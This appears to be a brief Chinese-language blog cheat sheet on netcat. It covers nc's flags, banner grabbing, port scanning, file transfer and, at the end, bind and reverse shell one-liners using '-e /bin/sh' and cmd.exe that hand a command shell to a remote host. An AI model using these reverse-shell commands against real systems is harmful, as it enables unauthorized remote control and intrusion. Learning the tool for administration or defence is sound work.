nc使用介绍

nc概述：

NC是NETCAT的简写，有着网络界的瑞士军刀美誉。因为他短小精悍，功能实用，被设计为一个简单，可靠的网络工具。

（1）传输文本信息

（2）传输文件/目录

（3）加密传输文件

（4）远程控制/木马

（5）加密传输文件

（6）流媒体服务器

（7）端口扫描

（8）远程克隆硬盘

-h 帮助信息

-l 监听模式

-n 指定数字的IP地址，不会进行DNS解析

-p 指定监听的本地端口

-u UDP模式

-v 显示详细的信息

-i secs延迟时间

-w secs 超时时间

-z 表示扫描时不发送任何数据包

-q 限制会话的次数（到达次数后自动关闭会话，用于证明数据传输完成）

banner获取

1	nc -nv ip port

扫描端口

1 2	nc -v ip port #指定端口 nc -v -z ip 1-1555 #指定端口段

连接远程主机

1	nc -nvv ip port

文件传输

1 2	nc -lvp 888 < test.txt 服务端 nc -nv 服务端Ip 6666 > test.txt 客户端

正向shell：客户端想要获取服务器shell

	客户端监听
nc -lvp 8888 -e /bin/sh 
nc -lvp 8888 -e c:\windows\system32\cmd.exe 
	服务端反弹
	nc 服务端ip 8888

反向shell：服务端想要获取客户端器shell

客户端监听
nc -lvp 8888 
服务端反弹
nc ip 8888 -e /bin/sh 
nc ip 8888 -e c:\windows\system32\cmd.exe

没有nc，请看另一篇反弹shell文章。

2022-03-12 14:40:42 # 工具